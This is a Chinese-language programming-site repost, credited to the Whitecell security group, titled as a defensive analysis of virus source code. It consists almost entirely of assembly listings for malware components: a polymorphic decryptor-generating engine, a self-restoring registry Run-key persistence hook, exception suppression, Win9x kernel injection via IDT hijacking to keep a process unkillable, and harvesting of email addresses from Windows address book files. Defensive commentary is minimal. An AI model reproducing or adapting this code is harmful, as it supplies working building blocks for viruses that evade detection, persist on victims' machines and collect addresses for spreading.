<del id="7msxa"><table id="7msxa"><strong id="7msxa"></strong></table></del><legend id="7msxa"></legend>

<tbody id="7msxa"></tbody>
  • <ol id="7msxa"></ol><th id="7msxa"><track id="7msxa"><rt id="7msxa"></rt></track></th>
    1. <dd id="7msxa"></dd>
    2. 首頁 > 編程 > Java > 正文

      病毒源碼解析之防御分析

      2019-09-06 23:33:18
      字體:
      來源:轉載
      供稿:網友
      1、超級病毒變形引擎

      此段代碼會在DATA段內生成一個解密代碼。

      .586p
      .model flat,STDCALL
      extrn ExitProcess: proc
      VirusSize=100h
      .data

      DecodeMethod dd ?
      DeCode:
      pushad
      call Encode
      db 100h dup(11h)
      Encode:
      db 100h dup(0cch)
      RndReg0 dd 0 ;eax
      RndReg1 dd 0 ;ebx
      RndCode dd 0 ;Rnd Code
      RndMima dd 60932561 ;Rnd Password

      .code
      @@Start:
      mov eax,RndMima
      ror eax,7
      mov RndCode,eax

      mov eax,RndCode
      mov ecx,eax
      and eax,011b
      mov RndReg0,eax
      xor ecx,RndMima
      and ecx,011b
      cmp eax,ecx
      jnz short ChooseRegOk
      inc ecx
      and ecx,011b
      ChooseRegOk:
      mov RndReg1,ecx


      mov edi,offset Encode

      ror RndCode,1
      call GetBxCode,0,RndReg0,RndCode
      mov esi,eax
      ContFillStep0:
      cld
      lodsb
      stosb
      cmp al,0cch
      jnz ContFillStep0
      dec edi

      ror RndCode,1
      call GetBxCode,1,RndReg1,RndCode
      mov esi,eax
      ContFillStep1:
      cld
      lodsb
      stosb
      cmp al,0cch
      jnz ContFillStep1
      dec edi

      mov ebx,edi ;//計算機Jmp指令用

      ror RndCode,1
      call GetBxCode,2,RndReg0,RndCode
      mov esi,eax
      ContFillStep2:
      cld
      lodsb
      stosb
      cmp al,0cch
      jnz ContFillStep2
      dec edi

      mov eax,RndMima
      mov [edi-4],eax ;//填寫隨機密碼
      mov eax,RndCode
      and eax,01
      mov DecodeMethod,eax ;//填寫DeCode方法

      ror RndCode,1
      call GetBxCode,3,RndReg0,RndCode
      mov esi,eax
      ContFillStep3:
      cld
      lodsb
      stosb
      cmp al,0cch
      jnz ContFillStep3
      dec edi

      ror RndCode,1
      call GetBxCode,4,RndReg1,RndCode
      mov esi,eax
      ContFillStep4:
      cld
      lodsb
      stosb
      cmp al,0cch
      jnz ContFillStep4
      dec edi

      ror RndCode,1
      call GetBxCode,5,RndReg0,RndCode
      mov esi,eax
      ContFillStep5:
      cld
      lodsb
      stosb
      cmp al,0cch
      jnz ContFillStep5
      dec edi

      mov al,0c3h
      mov [edi],al ;//填寫Ret指令

      sub ebx,edi
      mov [edi-1],bl ;//填寫jmp指令

      int 3;

      jmp DeCode
      ret
      GetBxCode proc uses ebx ecx edx esi edi,Step:dword,Reg:dword,Rnd:dword
      call GetBxCodeAddr
      Step0_Eax:
      mov eax,[esp]
      int 3;
      pop eax
      push eax
      int 3;
      Step0_Ebx:
      pop ebx
      push ebx
      int 3;
      push dword ptr[esp]
      pop ebx
      int 3;
      Step0_Ecx:
      mov ecx,[esp]
      int 3;
      pop ecx
      push ecx
      int 3;
      Step0_Edx:
      mov edx,[esp]
      int 3;
      mov edx,esp
      mov edx,[edx]
      int 3

      Step1_Eax:
      mov eax,VirusSize
      int 3
      sub eax,eax
      add ax,VirusSize+3081h
      sub ax,3081h
      int 3
      Step1_Ebx:
      mov ebx,VirusSize
      int 3;
      xor ebx,ebx
      or bx,VirusSize
      int 3;
      Step1_Ecx:
      sub ecx,ecx
      xor ecx,(VirusSize xor 3181h)
      xor ecx,(3181h)
      int 3;
      mov ecx,0
      and cx,VirusSize
      int 3
      Step1_Edx:
      and edx,0
      xor dx,(VirusSize-0281h)
      add dx,0281h
      int 3;
      xor edx,edx
      sub edx,(0181h-VirusSize)
      sub edx,-0181h
      int 3;

      Setp2_Eax:
      xor [eax],12345678h
      int 3
      add [eax],12345678h
      int 3
      Setp2_Ebx:
      xor [ebx],12345678h
      int 3;
      add [ebx],12345678h
      int 3;

      Setp2_Ecx:
      xor [ecx],12345678h
      int 3;
      add [ecx],12345678h
      int 3;
      Setp2_Edx:
      xor [edx],12345678h
      int 3;
      add [edx],12345678h
      int 3;
      Step3_Eax:
      add eax,4
      int 3
      inc eax
      inc eax
      inc eax
      inc eax
      int 3;
      Step3_Ebx:
      add ebx,5
      dec ebx
      int 3
      add ebx,2
      add ebx,2
      int 3;
      Step3_Ecx:
      sub ecx,-4
      int 3
      sub ecx,-5
      dec ecx
      int 3;
      Step3_Edx:
      inc edx
      sub edx,-3
      int 3
      add edx,04
      int 3;

      Step4_Eax:
      sub eax,4
      int 3
      dec eax
      dec eax
      dec eax
      sub eax,1
      int 3;
      Step4_Ebx:
      dec ebx
      sub ebx,3
      int 3;
      dec ebx
      dec ebx
      sub ebx,2
      int 3;
      Step4_Ecx:
      add cx,123
      sub cx,123+4
      int 3
      sub cx,-4
      dec cx
      sub cx,7
      int 3
      Step4_Edx:
      sub dx,2
      dec dx
      sub dx,1
      int 3
      inc edx
      sub dx,5
      int 3;
      Step5_Eax:
      jnz $
      int 3
      ja $
      int 3
      Step5_Ebx:
      jg $
      int 3
      jnb $
      int 3
      Step5_Ecx:
      jnl $
      int 3
      jnz $
      int 3
      Step5_Edx:
      ja $
      int 3
      jg $
      int 3

      GetBxCodeAddr:
      pop esi
      mov al,0cch ;//指令分割符
      mov ecx,Step
      shl ecx,1
      shl ecx,1
      add ecx,Reg ;//計算機得到的指令位置
      shl ecx,1
      and Rnd,01b
      add ecx,Rnd
      jcxz short GetBxCodeOver
      ContFindCode:
      push ecx
      ContFindCC:
      inc esi
      cmp [esi],al
      jnz ContFindCC
      pop ecx
      loop ContFindCode
      mov eax,esi
      inc eax
      ret
      GetBxCodeOver:
      mov eax,esi
      ret
      GetBxCode endp


      end @@Start


      2、Windows 9x/2000/xp 瑣定注冊表

      .586p
      .model flat,STDCALL
      .data

      HKeyStr db 'SOFTWAREMicrosoftWindowsCurrentVersionRun',0
      ValueName db 'wap32',0
      PathName db 'wap32.exe',0

      .code

      extrn RegOpenKeyA: proc
      extrn RegSetValueExA: proc
      extrn RegCloseKey: proc
      extrn ExitProcess: proc
      extrn RegNotifyChangeKeyValue: proc
      extrn CreateThread: proc
      extrn Sleep: proc
      extrn RegQueryValueExA: proc

      start:
      push eax
      call RegOpenKeyA,080000002h,offset HKeyStr,esp
      pop ebx
      call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h

      sub esp,100h
      mov eax,esp
      push 100h
      call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp
      pop eax
      add esp,100h

      push eax
      call CreateThread,0,0,offset RegProtectProc,ebx,0,esp
      pop eax
      call Sleep,1000*60*3
      ret

      RegProtectProc proc hKey:dword
      mov ebx,hKey
      sub esp,100h
      mov edi,esp
      call GetProtectKeyName
      db 'wap32',0
      GetProtectKeyName:
      pop esi
      push 100h
      call RegQueryValueExA,ebx,esi,0,0,edi,esp
      pop eax
      WaitRegChangeNotify:
      call RegNotifyChangeKeyValue,ebx,0,4,0,0
      call RegSetValueExA,ebx,esi,0,01,edi,100h
      jmp short WaitRegChangeNotify
      RegProtectProc endp

      end start



      3、 Windows 9x/2000 意外處理通用程序


      此段程序可以達到屏蔽程序錯誤的效果

      include wap32.inc

      .386p
      .model flat,stdcall

      extrn MessageBoxA: proc
      extrn ExitProcess: proc

      .data

      Msg db 'Fuck',0

      SetSehFrame: ;ecx=忽略錯誤繼續執行地址
      pop eax ;彈出返回地址
      push ecx ;保存忽略錯誤繼續執行地址
      call PushExceptionProc
      jmp short Exception
      PushExceptionProc:
      push fs:dword ptr[0]
      mov fs:[0],esp
      call GetEspAddr
      push D [edx] ;保存原Esp地址值
      mov [edx],esp
      jmp eax
      ClearSehFrame:
      pop eax ;彈出返回地址
      call GetEspAddr
      mov esp,[edx]
      pop D [edx] ;恢復原Esp地址值
      pop fs:dword ptr[0]
      pop ecx
      pop ecx ;彈出忽略錯誤繼續執行地址
      jmp eax

      Exception proc pRecord,pFrame,pContext,pDispatch
      call PushSehBackProc
      call ClearSehFrame
      jmp ecx
      PushSehBackProc:
      pop ecx
      mov eax,pContext
      mov [eax.cx_Eip],ecx
      xor eax,eax ;忽略錯誤繼續執行
      ret
      Exception endp

      GetEspAddr:
      call PushOffsetEspAddr
      dd ?
      PushOffsetEspAddr:
      pop edx
      ret


      .code

      Start:
      call PushErrorProc
      call MessageBoxA,0,offset Msg,offset Msg,0
      ret
      PushErrorProc:
      pop ecx
      call SetSehFrame
      mov ds:[0],eax
      call ClearSehFrame
      ret


      end Start



      4、Windows 9x 下進程不死術

      此段程序首先實現Win9x下注射遠程線程(新技術)
      然后與Win2k下進程不死術一樣了。
      include Win32.inc

      .386p
      .model flat,stdcall

      extrn GetProcAddress: proc
      extrn WinExec: proc
      extrn MessageBoxA: proc
      extrn Sleep: proc
      extrn GetCurrentProcessId: proc
      extrn OpenProcess: proc
      extrn GetCurrentProcess: proc
      extrn WriteProcessMemory: proc
      extrn GetExitCodeProcess: proc

      .data

      ;問題,要Sleep()這樣做使Kernel32有機會更新數據
      KnlThread proc ProcID:dword
      call GetKnlOpenProcess
      KnlOpenProcess dd ?
      GetKnlOpenProcess:
      pop eax
      call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID
      or eax,eax
      jz short ExitProtectProc
      mov ebx,eax
      call GetKnlWaitForSingleObject
      KnlWaitForSingleObject dd ?
      GetKnlWaitForSingleObject:
      pop eax
      call [eax],ebx,-1h
      call GetFileNameAddress
      GetFileNameAddress:
      pop ecx
      add ecx,offset FileName-offset GetFileNameAddress
      call GetKnlWinExec
      KnlWinExec dd ?
      GetKnlWinExec:
      pop eax
      call [eax],ecx,01
      ExitProtectProc:
      ret
      KnlThread endp

      FileName db 'c:wap32.exe',0

      KnlOpenProcessStr db 'OpenProcess',0
      KnlWaitForObjectStr db 'WaitForSingleObject',0
      KnlWinExecStr db 'WinExec',0
      KnlSleepStr db 'Sleep',0
      KnlCreateKnlThreadStr db 'CreateKernelThread',0

      .code

      Start:
      call GetProcAddress,0bff70000h,offset KnlOpenProcessStr
      mov KnlOpenProcess,eax
      call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr
      mov KnlWaitForSingleObject,eax
      call GetProcAddress,0bff70000h,offset KnlWinExecStr
      mov KnlWinExec,eax

      call MoveDataToKnl,offset Start,0bff70600h,100h

      call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr
      mov ebx,eax
      call GetCurrentProcessId
      push eax
      call ebx,0,0,0bff70000h+600h,eax,0,esp
      pop eax
      call MessageBoxA,0,offset FileName,offset FileName,0
      ret

      MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword
      push eax
      sidt [esp-2]
      pop eax
      add eax,3*8
      mov ebx,[eax]
      mov edx,[eax+4]
      call SetIdt03
      pushad
      mov [eax],ebx
      mov [eax+4],edx
      cld
      rep movsb
      popad
      iret
      SetIdt03:
      cli
      pop W[eax]
      pop W[eax+6]
      mov esi,Src
      mov edi,Des
      mov ecx,nCx
      int 3;
      sti
      ret
      MoveDataToKnl endp

      end Start


      5、簡單算法,高效率壓縮PE文件

      .586p
      .model flat,STDCALL
      .data

      OldFile db 'pe.exe',0
      NewFile db 'pe.zzz',0

      FileData db 0,0
      .code
      extrn _lopen: proc,_lcreat: proc
      extrn _lread: proc,_lwrite: proc
      extrn _lclose: proc
      extrn ExitProcess: proc
      start:
      call _lopen,offset OldFile,0
      cmp eax,-1
      jz ExitProc
      mov esi,eax
      call _lcreat,offset NewFile,0
      cmp eax,-1
      jz CloseOldFile
      mov edi,eax

      xor ebx,ebx
      ReadData:
      call _lread,esi,offset FileData,1
      or eax,eax
      jz short ReadOver
      movzx eax,FileData
      or eax,eax
      jnz short NoZero
      inc ebx
      cmp ebx,0ffh
      jnz short ReadData
      xor eax,eax
      mov ah,bl
      xchg ax,word ptr FileData
      call _lwrite,edi,offset FileData,2
      xor ebx,ebx
      jmp short ReadData
      NoZero:
      or ebx,ebx
      jnz short NoZeroData
      call _lwrite,edi,offset FileData,1
      jmp short ReadData
      NoZeroData:
      push eax
      xor eax,eax
      mov ah,bl
      mov word ptr FileData,ax
      call _lwrite,edi,offset FileData,2
      xor ebx,ebx
      pop eax
      mov FileData,al
      call _lwrite,edi,offset FileData,1
      jmp ReadData
      ReadOver:
      or ebx,ebx
      jz short CloseFile
      xor eax,eax
      mov ah,bl
      xchg ax,word ptr FileData
      call _lwrite,edi,offset FileData,2
      xor ebx,ebx
      CloseFile:
      call _lclose,edi
      CloseOldFile:
      call _lclose,esi
      ExitProc:
      call ExitProcess,0

      end start

      6、提取Windows地址薄文件(*.WAB)的Email信息

      .586p
      .model flat,STDCALL
      .data

      MailFile db 'My.WAB',0

      .code

      extrn _lopen: proc,_lcreat: proc
      extrn _lread: proc,_lwrite: proc
      extrn _llseek: proc
      extrn _lclose: proc
      extrn MessageBoxA: proc
      extrn ExitProcess: proc
      extrn WideCharToMultiByte: proc

      start:
      call _lopen,offset MailFile,0
      cmp eax,-1
      jz short ExitProc
      mov ebx,eax
      sub esp,100h
      mov edi,esp
      call _lread,ebx,edi,100h
      cmp eax,100h
      jnz short CloseFile
      mov eax,[edi+60h] ;得到Unicode郵件名偏移
      call _llseek,ebx,eax,0
      mov ecx,[edi+64h] ;得到Unicode郵件名個數
      ContWabMail:
      push ecx
      call _lread,ebx,edi,44h ;讀一個記錄
      cmp eax,44
      sub esp,100h
      mov eax,esp
      call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0
      mov eax,esp
      call MessageBoxA,0,eax,eax,0
      add esp,100h
      pop ecx
      loop short ContWabMail
      CloseFile:
      call _lclose,ebx
      ExitProc:
      call ExitProcess,0

      end start



      WSS(Whitecell Security Systems),一個非營利性民間技術組織,致力于各種系統安全技術的研究。堅持傳統的hacker精神,追求技術的精純。
      WSS 主頁:http://www.whitecell.org/
      WSS 論壇:http://www.whitecell.org/forum/
      發表評論 共有條評論
      用戶名: 密碼:
      驗證碼: 匿名發表
      japan日本人妻熟老太
      <del id="7msxa"><table id="7msxa"><strong id="7msxa"></strong></table></del><legend id="7msxa"></legend>

      <tbody id="7msxa"></tbody>
    3. <ol id="7msxa"></ol><th id="7msxa"><track id="7msxa"><rt id="7msxa"></rt></track></th>
      1. <dd id="7msxa"></dd>